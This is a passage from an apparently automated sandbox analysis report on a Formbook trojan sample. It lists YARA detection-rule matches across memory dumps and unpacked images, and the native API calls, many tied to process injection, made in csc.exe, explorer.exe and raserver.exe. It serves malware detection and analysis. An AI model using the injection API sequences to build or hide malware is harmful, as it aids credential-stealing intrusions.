          Source: Yara matchFile source: 00000005.00000002.11881186452.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.11881283456.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00D20115 SysStringLen,CryptDestroyKey,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,SysStringLen,SysStringLen,CryptImportKey,free,SysStringLen,CryptDecrypt,SysAllocStringByteLen,SysFreeString,free,5_2_00D20115
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00D20383 SysStringLen,CryptImportKey,GetLastError,CryptGenKey,GetLastError,CryptEncrypt,GetLastError,free,malloc,memset,memcpy,CryptEncrypt,GetLastError,free,SysFreeString,SysFreeString,CryptDestroyKey,CryptDestroyKey,SysFreeString,5_2_00D20383

          System Summary

          Source: 3.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.kHslwiV2w6.exe.1ed0971ad88.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.kHslwiV2w6.exe.1ed0971ad88.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.kHslwiV2w6.exe.1ed0971ad88.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.kHslwiV2w6.exe.1ed0958d6f0.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.kHslwiV2w6.exe.1ed0958d6f0.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.kHslwiV2w6.exe.1ed0958d6f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.6908193624.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.6908193624.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.6908193624.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.11880642057.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.11880642057.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.11880642057.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.6907188311.0000000005BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.6907188311.0000000005BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.6907188311.0000000005BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.11881186452.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.11881186452.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.11881186452.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.11881283456.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.11881283456.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.11881283456.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: kHslwiV2w6.exe PID: 7164, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: csc.exe PID: 1408, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: raserver.exe PID: 6624, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0041A360 NtCreateFile,3_2_0041A360
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0041A410 NtReadFile,3_2_0041A410
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0041A490 NtClose,3_2_0041A490
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0041A540 NtAllocateVirtualMemory,3_2_0041A540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0041A35B NtCreateFile,3_2_0041A35B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0041A3B2 NtCreateFile,3_2_0041A3B2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0041A40A NtReadFile,3_2_0041A40A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0041A48B NtClose,3_2_0041A48B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_05CA2DC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2DA0 NtReadVirtualMemory,LdrInitializeThunk,3_2_05CA2DA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2D10 NtQuerySystemInformation,LdrInitializeThunk,3_2_05CA2D10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2CF0 NtDelayExecution,LdrInitializeThunk,3_2_05CA2CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2C50 NtUnmapViewOfSection,LdrInitializeThunk,3_2_05CA2C50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2C30 NtMapViewOfSection,LdrInitializeThunk,3_2_05CA2C30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2F00 NtCreateFile,LdrInitializeThunk,3_2_05CA2F00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2ED0 NtResumeThread,LdrInitializeThunk,3_2_05CA2ED0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2EB0 NtProtectVirtualMemory,LdrInitializeThunk,3_2_05CA2EB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2E50 NtCreateSection,LdrInitializeThunk,3_2_05CA2E50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA29F0 NtReadFile,LdrInitializeThunk,3_2_05CA29F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2BC0 NtQueryInformationToken,LdrInitializeThunk,3_2_05CA2BC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2B90 NtFreeVirtualMemory,LdrInitializeThunk,3_2_05CA2B90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2B10 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_05CA2B10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2A80 NtClose,LdrInitializeThunk,3_2_05CA2A80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA4570 NtSuspendThread,3_2_05CA4570
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA34E0 NtCreateMutant,3_2_05CA34E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA4260 NtSetContextThread,3_2_05CA4260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2D50 NtWriteVirtualMemory,3_2_05CA2D50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2CD0 NtEnumerateKey,3_2_05CA2CD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA3C90 NtOpenThread,3_2_05CA3C90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2C10 NtOpenProcess,3_2_05CA2C10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2C20 NtSetInformationFile,3_2_05CA2C20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA3C30 NtOpenProcessToken,3_2_05CA3C30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2FB0 NtSetValueKey,3_2_05CA2FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2F30 NtOpenDirectoryObject,3_2_05CA2F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2EC0 NtQuerySection,3_2_05CA2EC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2E80 NtCreateProcessEx,3_2_05CA2E80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2E00 NtQueueApcThread,3_2_05CA2E00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA29D0 NtWaitForSingleObject,3_2_05CA29D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA38D0 NtGetContextThread,3_2_05CA38D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2BE0 NtQueryVirtualMemory,3_2_05CA2BE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2B80 NtCreateKey,3_2_05CA2B80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2B00 NtQueryValueKey,3_2_05CA2B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2B20 NtQueryInformationProcess,3_2_05CA2B20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2AC0 NtEnumerateValueKey,3_2_05CA2AC0
          Source: C:\Windows\explorer.exeCode function: 4_2_0287EE12 NtProtectVirtualMemory,4_2_0287EE12
          Source: C:\Windows\explorer.exeCode function: 4_2_0287D232 NtCreateFile,4_2_0287D232
          Source: C:\Windows\explorer.exeCode function: 4_2_0287EE0A NtProtectVirtualMemory,4_2_0287EE0A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD34E0 NtCreateMutant,LdrInitializeThunk,5_2_04FD34E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2CF0 NtDelayExecution,LdrInitializeThunk,5_2_04FD2CF0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2C30 NtMapViewOfSection,LdrInitializeThunk,5_2_04FD2C30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_04FD2DC0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2D10 NtQuerySystemInformation,LdrInitializeThunk,5_2_04FD2D10
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2E50 NtCreateSection,LdrInitializeThunk,5_2_04FD2E50
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2F00 NtCreateFile,LdrInitializeThunk,5_2_04FD2F00
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD29F0 NtReadFile,LdrInitializeThunk,5_2_04FD29F0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2A80 NtClose,LdrInitializeThunk,5_2_04FD2A80
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2BC0 NtQueryInformationToken,LdrInitializeThunk,5_2_04FD2BC0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2B90 NtFreeVirtualMemory,LdrInitializeThunk,5_2_04FD2B90
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2B80 NtCreateKey,LdrInitializeThunk,5_2_04FD2B80
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2B10 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_04FD2B10
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2B00 NtQueryValueKey,LdrInitializeThunk,5_2_04FD2B00
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD4570 NtSuspendThread,5_2_04FD4570
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD4260 NtSetContextThread,5_2_04FD4260
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2CD0 NtEnumerateKey,5_2_04FD2CD0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD3C90 NtOpenThread,5_2_04FD3C90
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2C50 NtUnmapViewOfSection,5_2_04FD2C50
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD3C30 NtOpenProcessToken,5_2_04FD3C30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2C20 NtSetInformationFile,5_2_04FD2C20
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2C10 NtOpenProcess,5_2_04FD2C10
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2DA0 NtReadVirtualMemory,5_2_04FD2DA0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2D50 NtWriteVirtualMemory,5_2_04FD2D50
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2ED0 NtResumeThread,5_2_04FD2ED0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2EC0 NtQuerySection,5_2_04FD2EC0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2EB0 NtProtectVirtualMemory,5_2_04FD2EB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2E80 NtCreateProcessEx,5_2_04FD2E80
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2E00 NtQueueApcThread,5_2_04FD2E00
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2FB0 NtSetValueKey,5_2_04FD2FB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2F30 NtOpenDirectoryObject,5_2_04FD2F30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD38D0 NtGetContextThread,5_2_04FD38D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD29D0 NtWaitForSingleObject,5_2_04FD29D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2AC0 NtEnumerateValueKey,5_2_04FD2AC0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2AA0 NtQueryInformationFile,5_2_04FD2AA0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2A10 NtWriteFile,5_2_04FD2A10
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2BE0 NtQueryVirtualMemory,5_2_04FD2BE0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2B20 NtQueryInformationProcess,5_2_04FD2B20
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C6A360 NtCreateFile,5_2_00C6A360
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C6A490 NtClose,5_2_00C6A490
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C6A410 NtReadFile,5_2_00C6A410
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C6A540 NtAllocateVirtualMemory,5_2_00C6A540
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C6A3B2 NtCreateFile,5_2_00C6A3B2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C6A35B NtCreateFile,5_2_00C6A35B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C6A48B NtClose,5_2_00C6A48B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C6A40A NtReadFile,5_2_00C6A40A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_052BA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,5_2_052BA036
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_052B9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,5_2_052B9BAF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_052BA042 NtQueryInformationProcess,5_2_052BA042
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_052B9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_052B9BB2
          Source: kHslwiV2w6.exe Static PE information: invalid certificate
          Source: kHslwiV2w6.exe Binary or memory string: OriginalFilename vs kHslwiV2w6.exe
          Source: kHslwiV2w6.exe, 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLeadingZeroCountAttribute.dllT vs kHslwiV2w6.exe
          Source: kHslwiV2w6.exe, 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameLeadingZeroCountAttribute.dllT vs kHslwiV2w6.exe
          Source: kHslwiV2w6.exe Binary or memory string: OriginalFilenameLeadingZeroCountAttribute.dllT vs kHslwiV2w6.exe
          Source: 3.2.csc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.csc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.csc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.kHslwiV2w6.exe.1ed0971ad88.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.kHslwiV2w6.exe.1ed0971ad88.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.kHslwiV2w6.exe.1ed0971ad88.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.kHslwiV2w6.exe.1ed0958d6f0.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.kHslwiV2w6.exe.1ed0958d6f0.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.kHslwiV2w6.exe.1ed0958d6f0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.6908193624.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.6908193624.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.6908193624.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.11880642057.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.11880642057.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
